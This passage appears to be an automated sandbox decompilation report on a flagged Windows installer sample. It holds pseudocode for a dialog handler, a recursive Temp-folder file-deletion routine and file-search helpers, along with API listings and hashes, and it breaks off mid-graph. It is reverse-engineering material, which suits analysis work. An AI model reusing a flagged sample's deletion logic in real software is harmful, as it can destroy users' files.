                                  				int _v56;
                                  				void* _v60;
                                  				void* _v68;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				struct HWND__* _t94;
                                  				long _t95;
                                  				int _t100;
                                  				int _t101;
                                  				long _t104;
                                  				void* _t108;
                                  				intOrPtr _t119;
                                  				void* _t127;
                                  				intOrPtr _t130;
                                  				struct HWND__* _t134;
                                  				int _t156;
                                  				int _t159;
                                  				struct HMENU__* _t164;
                                  				struct HWND__* _t168;
                                  				struct HWND__* _t169;
                                  				int _t171;
                                  				void* _t172;
                                  				short* _t173;
                                  				short* _t175;
                                  				int _t177;
                                  
                                  				_t169 =  *0x433ee4; // 0x103e8
                                  				_t156 = 0;
                                  				_v8 = _t169;
                                  				if(_a8 != 0x110) {
                                  					__eflags = _a8 - 0x405;
                                  					if(_a8 == 0x405) {
                                  						_t127 = CreateThread(0, 0, E00405672, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
                                  						FindCloseChangeNotification(_t127); // executed
                                  					}
                                  					__eflags = _a8 - 0x111;
                                  					if(_a8 != 0x111) {
                                  						L17:
                                  						_t171 = 1;
                                  						__eflags = _a8 - 0x404;
                                  						if(_a8 != 0x404) {
                                  							L25:
                                  							__eflags = _a8 - 0x7b;
                                  							if(_a8 != 0x7b) {
                                  								goto L20;
                                  							}
                                  							_t94 = _v8;
                                  							__eflags = _a12 - _t94;
                                  							if(_a12 != _t94) {
                                  								goto L20;
                                  							}
                                  							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
                                  							__eflags = _t95 - _t156;
                                  							_a8 = _t95;
                                  							if(_t95 <= _t156) {
                                  								L36:
                                  								return 0;
                                  							}
                                  							_t164 = CreatePopupMenu();
                                  							AppendMenuW(_t164, _t156, _t171, E0040657A(_t156, _t164, _t171, _t156, 0xffffffe1));
                                  							_t100 = _a16;
                                  							__eflags = _a16 - 0xffffffff;
                                  							_t159 = _a16 >> 0x10;
                                  							if(_a16 == 0xffffffff) {
                                  								GetWindowRect(_v8,  &_v28);
                                  								_t100 = _v28.left;
                                  								_t159 = _v28.top;
                                  							}
                                  							_t101 = TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156);
                                  							__eflags = _t101 - _t171;
                                  							if(_t101 == _t171) {
                                  								_v60 = _t156;
                                  								_v48 = 0x42d268;
                                  								_v44 = 0x1000;
                                  								_a4 = _a8;
                                  								do {
                                  									_a4 = _a4 - 1;
                                  									_t104 = SendMessageW(_v8, 0x1073, _a4,  &_v68);
                                  									__eflags = _a4 - _t156;
                                  									_t171 = _t171 + _t104 + 2;
                                  								} while (_a4 != _t156);
                                  								OpenClipboard(_t156);
                                  								EmptyClipboard();
                                  								_t108 = GlobalAlloc(0x42, _t171 + _t171);
                                  								_a4 = _t108;
                                  								_t172 = GlobalLock(_t108);
                                  								do {
                                  									_v48 = _t172;
                                  									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
                                  									 *_t173 = 0xd;
                                  									_t175 = _t173 + 2;
                                  									 *_t175 = 0xa;
                                  									_t172 = _t175 + 2;
                                  									_t156 = _t156 + 1;
                                  									__eflags = _t156 - _a8;
                                  								} while (_t156 < _a8);
                                  								GlobalUnlock(_a4);
                                  								SetClipboardData(0xd, _a4);
                                  								CloseClipboard();
                                  							}
                                  							goto L36;
                                  						}
                                  						__eflags =  *0x433ecc - _t156; // 0x0
                                  						if(__eflags == 0) {
                                  							ShowWindow( *0x434f08, 8);
                                  							__eflags =  *0x434f8c - _t156;
                                  							if( *0x434f8c == _t156) {
                                  								_t119 =  *0x42c240; // 0x80bf74
                                  								E0040559F( *((intOrPtr*)(_t119 + 0x34)), _t156);
                                  							}
                                  							E00404472(_t171);
                                  							goto L25;
                                  						}
                                  						 *0x42ba38 = 2;
                                  						E00404472(0x78);
                                  						goto L20;
                                  					} else {
                                  						__eflags = _a12 - 0x403;
                                  						if(_a12 != 0x403) {
                                  							L20:
                                  							return E00404500(_a8, _a12, _a16);
                                  						}
                                  						ShowWindow( *0x433ed0, _t156);
                                  						ShowWindow(_t169, 8);
                                  						E004044CE(_t169);
                                  						goto L17;
                                  					}
                                  				}
                                  				_v52 = _v52 | 0xffffffff;
                                  				_v40 = _v40 | 0xffffffff;
                                  				_t177 = 2;
                                  				_v60 = _t177;
                                  				_v56 = 0;
                                  				_v48 = 0;
                                  				_v44 = 0;
                                  				asm("stosd");
                                  				asm("stosd");
                                  				_t130 =  *0x434f10;
                                  				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
                                  				_a12 =  *((intOrPtr*)(_t130 + 0x60));
                                  				 *0x433ed0 = GetDlgItem(_a4, 0x403);
                                  				 *0x433ec8 = GetDlgItem(_a4, 0x3ee);
                                  				_t134 = GetDlgItem(_a4, 0x3f8);
                                  				 *0x433ee4 = _t134;
                                  				_v8 = _t134;
                                  				E004044CE( *0x433ed0);
                                  				 *0x433ed4 = E00404E27(4);
                                  				 *0x433eec = 0;
                                  				GetClientRect(_v8,  &_v28);
                                  				_v52 = _v28.right - GetSystemMetrics(_t177);
                                  				SendMessageW(_v8, 0x1061, 0,  &_v60); // executed
                                  				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
                                  				if(_a8 >= 0) {
                                  					SendMessageW(_v8, 0x1001, 0, _a8);
                                  					SendMessageW(_v8, 0x1026, 0, _a8);
                                  				}
                                  				if(_a12 >= _t156) {
                                  					SendMessageW(_v8, 0x1024, _t156, _a12);
                                  				}
                                  				_push( *((intOrPtr*)(_a16 + 0x30)));
                                  				_push(0x1b);
                                  				E00404499(_a4);
                                  				if(( *0x434f18 & 0x00000003) != 0) {
                                  					ShowWindow( *0x433ed0, _t156);
                                  					if(( *0x434f18 & 0x00000002) != 0) {
                                  						 *0x433ed0 = _t156;
                                  					} else {
                                  						ShowWindow(_v8, 8);
                                  					}
                                  					E004044CE( *0x433ec8);
                                  				}
                                  				_t168 = GetDlgItem(_a4, 0x3ec);
                                  				SendMessageW(_t168, 0x401, _t156, 0x75300000);
                                  				if(( *0x434f18 & 0x00000004) != 0) {
                                  					SendMessageW(_t168, 0x409, _t156, _a12);
                                  					SendMessageW(_t168, 0x2001, _t156, _a8);
                                  				}
                                  				goto L36;
                                  			}





































                                  0x004056e6
                                  0x004056ec
                                  0x004056f6
                                  0x004056f9
                                  0x00405888
                                  0x0040588f
                                  0x004058ac
                                  0x004058b3
                                  0x004058b3
                                  0x004058b9
                                  0x004058c6
                                  0x004058e4
                                  0x004058e6
                                  0x004058e7
                                  0x004058ee
                                  0x00405944
                                  0x00405944
                                  0x00405948
                                  0x00000000
                                  0x00000000
                                  0x0040594a
                                  0x0040594d
                                  0x00405950
                                  0x00000000
                                  0x00000000
                                  0x0040595a
                                  0x00405960
                                  0x00405962
                                  0x00405965
                                  0x00405a67
                                  0x00000000
                                  0x00405a67
                                  0x00405974
                                  0x0040597f
                                  0x00405988
                                  0x0040598f
                                  0x00405993
                                  0x00405996
                                  0x0040599f
                                  0x004059a5
                                  0x004059a8
                                  0x004059a8
                                  0x004059b8
                                  0x004059be
                                  0x004059c0
                                  0x004059c9
                                  0x004059cc
                                  0x004059d3
                                  0x004059da
                                  0x004059e2
                                  0x004059e2
                                  0x004059f0
                                  0x004059f6
                                  0x004059f9
                                  0x004059f9
                                  0x00405a00
                                  0x00405a06
                                  0x00405a12
                                  0x00405a19
                                  0x00405a22
                                  0x00405a24
                                  0x00405a27
                                  0x00405a36
                                  0x00405a39
                                  0x00405a3f
                                  0x00405a40
                                  0x00405a46
                                  0x00405a47
                                  0x00405a48
                                  0x00405a48
                                  0x00405a50
                                  0x00405a5b
                                  0x00405a61
                                  0x00405a61
                                  0x00000000
                                  0x004059c0
                                  0x004058f0
                                  0x004058f6
                                  0x00405926
                                  0x00405928
                                  0x0040592e
                                  0x00405930
                                  0x00405939
                                  0x00405939
                                  0x0040593f
                                  0x00000000
                                  0x0040593f
                                  0x004058fa
                                  0x00405904
                                  0x00000000
                                  0x004058c8
                                  0x004058c8
                                  0x004058ce
                                  0x00405909
                                  0x00000000
                                  0x00405912
                                  0x004058d7
                                  0x004058dc
                                  0x004058df
                                  0x00000000
                                  0x004058df
                                  0x004058c6
                                  0x004056ff
                                  0x00405703
                                  0x0040570b
                                  0x0040570f
                                  0x00405712
                                  0x00405715
                                  0x00405718
                                  0x0040571b
                                  0x0040571c
                                  0x0040571d
                                  0x00405736
                                  0x00405739
                                  0x00405743
                                  0x00405752
                                  0x0040575a
                                  0x00405762
                                  0x00405767
                                  0x0040576a
                                  0x00405776
                                  0x0040577f
                                  0x00405788
                                  0x004057aa
                                  0x004057b0
                                  0x004057c1
                                  0x004057c6
                                  0x004057d4
                                  0x004057e2
                                  0x004057e2
                                  0x004057e7
                                  0x004057f5
                                  0x004057f5
                                  0x004057fa
                                  0x004057fd
                                  0x00405802
                                  0x0040580e
                                  0x00405817
                                  0x00405824
                                  0x00405833
                                  0x00405826
                                  0x0040582b
                                  0x0040582b
                                  0x0040583f
                                  0x0040583f
                                  0x00405853
                                  0x0040585c
                                  0x00405865
                                  0x00405875
                                  0x00405881
                                  0x00405881
                                  0x00000000

                                  APIs
                                  • GetDlgItem.USER32 ref: 0040573C
                                  • GetDlgItem.USER32 ref: 0040574B
                                  • GetClientRect.USER32(?,?), ref: 00405788
                                  • GetSystemMetrics.USER32 ref: 0040578F
                                  • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B0
                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C1
                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057D4
                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E2
                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057F5
                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405817
                                  • ShowWindow.USER32(?,00000008), ref: 0040582B
                                  • GetDlgItem.USER32 ref: 0040584C
                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040585C
                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405875
                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405881
                                  • GetDlgItem.USER32 ref: 0040575A
                                    • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                  • GetDlgItem.USER32 ref: 0040589E
                                  • CreateThread.KERNELBASE ref: 004058AC
                                  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004058B3
                                  • ShowWindow.USER32(00000000), ref: 004058D7
                                  • ShowWindow.USER32(000103E8,00000008), ref: 004058DC
                                  • ShowWindow.USER32(00000008), ref: 00405926
                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040595A
                                  • CreatePopupMenu.USER32 ref: 0040596B
                                  • AppendMenuW.USER32 ref: 0040597F
                                  • GetWindowRect.USER32 ref: 0040599F
                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059B8
                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F0
                                  • OpenClipboard.USER32(00000000), ref: 00405A00
                                  • EmptyClipboard.USER32 ref: 00405A06
                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A12
                                  • GlobalLock.KERNEL32 ref: 00405A1C
                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A30
                                  • GlobalUnlock.KERNEL32(00000000), ref: 00405A50
                                  • SetClipboardData.USER32 ref: 00405A5B
                                  • CloseClipboard.USER32 ref: 00405A61
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                  • String ID: {
                                  • API String ID: 4154960007-366298937
                                  • Opcode ID: efbbf4d88f7660e4c87201c03f03245d3270aa31951a4a241d93bb0c475bbbe6
                                  • Instruction ID: 6b97441d6f4cfe62a880681573964a63c423f2dd70b2063085686802d9cc5617
                                  • Opcode Fuzzy Hash: efbbf4d88f7660e4c87201c03f03245d3270aa31951a4a241d93bb0c475bbbe6
                                  • Instruction Fuzzy Hash: C8B169B1900608FFDB119FA0DD85AAE7B79FB44355F00803AFA41BA1A0C7755E51DF58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 442 405c49-405c6f call 405f14 445 405c71-405c83 DeleteFileW 442->445 446 405c88-405c8f 442->446 447 405e05-405e09 445->447 448 405c91-405c93 446->448 449 405ca2-405cb2 call 40653d 446->449 450 405db3-405db8 448->450 451 405c99-405c9c 448->451 455 405cc1-405cc2 call 405e58 449->455 456 405cb4-405cbf lstrcatW 449->456 450->447 454 405dba-405dbd 450->454 451->449 451->450 457 405dc7-405dcf call 406873 454->457 458 405dbf-405dc5 454->458 460 405cc7-405ccb 455->460 456->460 457->447 466 405dd1-405de5 call 405e0c call 405c01 457->466 458->447 463 405cd7-405cdd lstrcatW 460->463 464 405ccd-405cd5 460->464 465 405ce2-405cfe lstrlenW FindFirstFileW 463->465 464->463 464->465 467 405d04-405d0c 465->467 468 405da8-405dac 465->468 482 405de7-405dea 466->482 483 405dfd-405e00 call 40559f 466->483 470 405d2c-405d40 call 40653d 467->470 471 405d0e-405d16 467->471 468->450 473 405dae 468->473 484 405d42-405d4a 470->484 485 405d57-405d62 call 405c01 470->485 474 405d18-405d20 471->474 475 405d8b-405d9b FindNextFileW 471->475 473->450 474->470 478 405d22-405d2a 474->478 475->467 481 405da1-405da2 FindClose 475->481 478->470 478->475 481->468 482->458 486 405dec-405dfb call 40559f call 4062fd 482->486 483->447 484->475 487 405d4c-405d55 call 405c49 484->487 493 405d83-405d86 call 40559f 485->493 494 405d64-405d67 485->494 486->447 487->475 493->475 497 405d69-405d79 call 40559f call 4062fd 494->497 498 405d7b-405d81 494->498 497->475 498->475
                                  C-Code - Quality: 98%
                                  			E00405C49(void* __eflags, signed int _a4, signed int _a8) {
                                  				signed int _v8;
                                  				signed int _v12;
                                  				short _v556;
                                  				short _v558;
                                  				struct _WIN32_FIND_DATAW _v604;
                                  				signed int _t38;
                                  				signed int _t52;
                                  				signed int _t55;
                                  				signed int _t62;
                                  				void* _t64;
                                  				signed char _t65;
                                  				WCHAR* _t66;
                                  				void* _t67;
                                  				WCHAR* _t68;
                                  				void* _t70;
                                  
                                  				_t65 = _a8;
                                  				_t68 = _a4;
                                  				_v8 = _t65 & 0x00000004;
                                  				_t38 = E00405F14(__eflags, _t68);
                                  				_v12 = _t38;
                                  				if((_t65 & 0x00000008) != 0) {
                                  					_t62 = DeleteFileW(_t68); // executed
                                  					asm("sbb eax, eax");
                                  					_t64 =  ~_t62 + 1;
                                  					 *0x434f88 =  *0x434f88 + _t64;
                                  					return _t64;
                                  				}
                                  				_a4 = _t65;
                                  				_t8 =  &_a4;
                                  				 *_t8 = _a4 & 0x00000001;
                                  				__eflags =  *_t8;
                                  				if( *_t8 == 0) {
                                  					L5:
                                  					E0040653D(0x42f270, _t68);
                                  					__eflags = _a4;
                                  					if(_a4 == 0) {
                                  						E00405E58(_t68);
                                  					} else {
                                  						lstrcatW(0x42f270, L"\\*.*");
                                  					}
                                  					__eflags =  *_t68;
                                  					if( *_t68 != 0) {
                                  						L10:
                                  						lstrcatW(_t68, 0x40a014);
                                  						L11:
                                  						_t66 =  &(_t68[lstrlenW(_t68)]);
                                  						_t38 = FindFirstFileW(0x42f270,  &_v604);
                                  						_t70 = _t38;
                                  						__eflags = _t70 - 0xffffffff;
                                  						if(_t70 == 0xffffffff) {
                                  							L26:
                                  							__eflags = _a4;
                                  							if(_a4 != 0) {
                                  								_t30 = _t66 - 2;
                                  								 *_t30 =  *(_t66 - 2) & 0x00000000;
                                  								__eflags =  *_t30;
                                  							}
                                  							goto L28;
                                  						} else {
                                  							goto L12;
                                  						}
                                  						do {
                                  							L12:
                                  							__eflags = _v604.cFileName - 0x2e;
                                  							if(_v604.cFileName != 0x2e) {
                                  								L16:
                                  								E0040653D(_t66,  &(_v604.cFileName));
                                  								__eflags = _v604.dwFileAttributes & 0x00000010;
                                  								if(__eflags == 0) {
                                  									_t52 = E00405C01(__eflags, _t68, _v8);
                                  									__eflags = _t52;
                                  									if(_t52 != 0) {
                                  										E0040559F(0xfffffff2, _t68);
                                  									} else {
                                  										__eflags = _v8 - _t52;
                                  										if(_v8 == _t52) {
                                  											 *0x434f88 =  *0x434f88 + 1;
                                  										} else {
                                  											E0040559F(0xfffffff1, _t68);
                                  											E004062FD(_t67, _t68, 0);
                                  										}
                                  									}
                                  								} else {
                                  									__eflags = (_a8 & 0x00000003) - 3;
                                  									if(__eflags == 0) {
                                  										E00405C49(__eflags, _t68, _a8);
                                  									}
                                  								}
                                  								goto L24;
                                  							}
                                  							__eflags = _v558;
                                  							if(_v558 == 0) {
                                  								goto L24;
                                  							}
                                  							__eflags = _v558 - 0x2e;
                                  							if(_v558 != 0x2e) {
                                  								goto L16;
                                  							}
                                  							__eflags = _v556;
                                  							if(_v556 == 0) {
                                  								goto L24;
                                  							}
                                  							goto L16;
                                  							L24:
                                  							_t55 = FindNextFileW(_t70,  &_v604);
                                  							__eflags = _t55;
                                  						} while (_t55 != 0);
                                  						_t38 = FindClose(_t70);
                                  						goto L26;
                                  					}
                                  					__eflags =  *0x42f270 - 0x5c;
                                  					if( *0x42f270 != 0x5c) {
                                  						goto L11;
                                  					}
                                  					goto L10;
                                  				} else {
                                  					__eflags = _t38;
                                  					if(_t38 == 0) {
                                  						L28:
                                  						__eflags = _a4;
                                  						if(_a4 == 0) {
                                  							L36:
                                  							return _t38;
                                  						}
                                  						__eflags = _v12;
                                  						if(_v12 != 0) {
                                  							_t38 = E00406873(_t68);
                                  							__eflags = _t38;
                                  							if(_t38 == 0) {
                                  								goto L36;
                                  							}
                                  							E00405E0C(_t68);
                                  							_t38 = E00405C01(__eflags, _t68, _v8 | 0x00000001);
                                  							__eflags = _t38;
                                  							if(_t38 != 0) {
                                  								return E0040559F(0xffffffe5, _t68);
                                  							}
                                  							__eflags = _v8;
                                  							if(_v8 == 0) {
                                  								goto L30;
                                  							}
                                  							E0040559F(0xfffffff1, _t68);
                                  							return E004062FD(_t67, _t68, 0);
                                  						}
                                  						L30:
                                  						 *0x434f88 =  *0x434f88 + 1;
                                  						return _t38;
                                  					}
                                  					__eflags = _t65 & 0x00000002;
                                  					if((_t65 & 0x00000002) == 0) {
                                  						goto L28;
                                  					}
                                  					goto L5;
                                  				}
                                  			}


















                                  0x00405c53
                                  0x00405c58
                                  0x00405c61
                                  0x00405c64
                                  0x00405c6c
                                  0x00405c6f
                                  0x00405c72
                                  0x00405c7a
                                  0x00405c7c
                                  0x00405c7d
                                  0x00000000
                                  0x00405c7d
                                  0x00405c88
                                  0x00405c8b
                                  0x00405c8b
                                  0x00405c8b
                                  0x00405c8f
                                  0x00405ca2
                                  0x00405ca9
                                  0x00405cae
                                  0x00405cb2
                                  0x00405cc2
                                  0x00405cb4
                                  0x00405cba
                                  0x00405cba
                                  0x00405cc7
                                  0x00405ccb
                                  0x00405cd7
                                  0x00405cdd
                                  0x00405ce2
                                  0x00405ce8
                                  0x00405cf3
                                  0x00405cf9
                                  0x00405cfb
                                  0x00405cfe
                                  0x00405da8
                                  0x00405da8
                                  0x00405dac
                                  0x00405dae
                                  0x00405dae
                                  0x00405dae
                                  0x00405dae
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00405d04
                                  0x00405d04
                                  0x00405d04
                                  0x00405d0c
                                  0x00405d2c
                                  0x00405d34
                                  0x00405d39
                                  0x00405d40
                                  0x00405d5b
                                  0x00405d60
                                  0x00405d62
                                  0x00405d86
                                  0x00405d64
                                  0x00405d64
                                  0x00405d67
                                  0x00405d7b
                                  0x00405d69
                                  0x00405d6c
                                  0x00405d74
                                  0x00405d74
                                  0x00405d67
                                  0x00405d42
                                  0x00405d48
                                  0x00405d4a
                                  0x00405d50
                                  0x00405d50
                                  0x00405d4a
                                  0x00000000
                                  0x00405d40
                                  0x00405d0e
                                  0x00405d16
                                  0x00000000
                                  0x00000000
                                  0x00405d18
                                  0x00405d20
                                  0x00000000
                                  0x00000000
                                  0x00405d22
                                  0x00405d2a
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00405d8b
                                  0x00405d93
                                  0x00405d99
                                  0x00405d99
                                  0x00405da2
                                  0x00000000
                                  0x00405da2
                                  0x00405ccd
                                  0x00405cd5
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00405c91
                                  0x00405c91
                                  0x00405c93
                                  0x00405db3
                                  0x00405db5
                                  0x00405db8
                                  0x00405e09
                                  0x00405e09
                                  0x00405e09
                                  0x00405dba
                                  0x00405dbd
                                  0x00405dc8
                                  0x00405dcd
                                  0x00405dcf
                                  0x00000000
                                  0x00000000
                                  0x00405dd2
                                  0x00405dde
                                  0x00405de3
                                  0x00405de5
                                  0x00000000
                                  0x00405e00
                                  0x00405de7
                                  0x00405dea
                                  0x00000000
                                  0x00000000
                                  0x00405def
                                  0x00000000
                                  0x00405df6
                                  0x00405dbf
                                  0x00405dbf
                                  0x00000000
                                  0x00405dbf
                                  0x00405c99
                                  0x00405c9c
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00405c9c

                                  APIs
                                  • DeleteFileW.KERNELBASE(?,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C72
                                  • lstrcatW.KERNEL32(0042F270,\*.*), ref: 00405CBA
                                  • lstrcatW.KERNEL32(?,0040A014), ref: 00405CDD
                                  • lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CE3
                                  • FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CF3
                                  • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D93
                                  • FindClose.KERNEL32(00000000), ref: 00405DA2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                  • String ID: .$.$C:\Users\user\AppData\Local\Temp\$\*.*
                                  • API String ID: 2035342205-4130279798
                                  • Opcode ID: 91e5555b9508150fcf6e55f7c9d4dc2ae8152fc7335161658e002f7252bbf59f
                                  • Instruction ID: 8b2ee76931e9ba666d6dc67a471f1b560bbb00ea1adf29c264b32972d7114dcf
                                  • Opcode Fuzzy Hash: 91e5555b9508150fcf6e55f7c9d4dc2ae8152fc7335161658e002f7252bbf59f
                                  • Instruction Fuzzy Hash: 3D41A130900A14BADB216B65CC8DABF7678DF81714F14817FF841B21D1D77C4A819EAE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00406873(WCHAR* _a4) {
                                  				void* _t2;
                                  
                                  				_t2 = FindFirstFileW(_a4, 0x4302b8); // executed
                                  				if(_t2 == 0xffffffff) {
                                  					return 0;
                                  				}
                                  				FindClose(_t2);
                                  				return 0x4302b8;
                                  			}




                                  0x0040687e
                                  0x00406887
                                  0x00000000
                                  0x00406894
                                  0x0040688a
                                  0x00000000

                                  APIs
                                  • FindFirstFileW.KERNELBASE(76CDFAA0,004302B8,0042FA70,00405F5D,0042FA70,0042FA70,00000000,0042FA70,0042FA70,76CDFAA0,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\), ref: 0040687E
                                  • FindClose.KERNEL32(00000000), ref: 0040688A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: Find$CloseFileFirst
                                  • String ID:
                                  • API String ID: 2295610775-0
                                  • Opcode ID: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                  • Instruction ID: 67599a3b69382adcf67454a25bfea179debcebd0a6e2e92eb77ede12202c023a
                                  • Opcode Fuzzy Hash: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                  • Instruction Fuzzy Hash: C3D012325192205FC3402B386E0C84B7A989F16331726CB76B4AAF51E0D7388C7387BD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 194 403f9a-403fac 195 403fb2-403fb8 194->195 196 404113-404122 194->196 195->196 197 403fbe-403fc7 195->197 198 404171-404186 196->198 199 404124-40415f GetDlgItem * 2 call 404499 KiUserCallbackDispatcher call 40140b 196->199 202 403fc9-403fd6 SetWindowPos 197->202 203 403fdc-403fe3 197->203 200 4041c6-4041cb call 4044e5 198->200 201 404188-40418b 198->201 226 404164-40416c 199->226 213 4041d0-4041eb 200->213 205 40418d-404198 call 401389 201->205 206 4041be-4041c0 201->206 202->203 208 403fe5-403fff ShowWindow 203->208 209 404027-40402d 203->209 205->206 230 40419a-4041b9 SendMessageW 205->230 206->200 212 404466 206->212 214 404100-40410e call 404500 208->214 215 404005-404018 GetWindowLongW 208->215 216 404046-404049 209->216 217 40402f-404041 DestroyWindow 209->217 224 404468-40446f 212->224 221 4041f4-4041fa 213->221 222 4041ed-4041ef call 40140b 213->222 214->224 215->214 223 40401e-404021 ShowWindow 215->223 227 40404b-404057 SetWindowLongW 216->227 228 40405c-404062 216->228 225 404443-404449 217->225 234 404200-40420b 221->234 235 404424-40443d DestroyWindow EndDialog 221->235 222->221 223->209 225->212 233 40444b-404451 225->233 226->198 227->224 228->214 229 404068-404077 GetDlgItem 228->229 236 404096-404099 229->236 237 404079-404090 SendMessageW IsWindowEnabled 229->237 230->224 233->212 238 404453-40445c ShowWindow 233->238 234->235 239 404211-40425e call 40657a call 404499 * 3 GetDlgItem 234->239 235->225 240 40409b-40409c 236->240 241 40409e-4040a1 236->241 237->212 237->236 238->212 266 404260-404265 239->266 267 404268-4042a4 ShowWindow KiUserCallbackDispatcher call 4044bb EnableWindow 239->267 243 4040cc-4040d1 call 404472 240->243 244 4040a3-4040a9 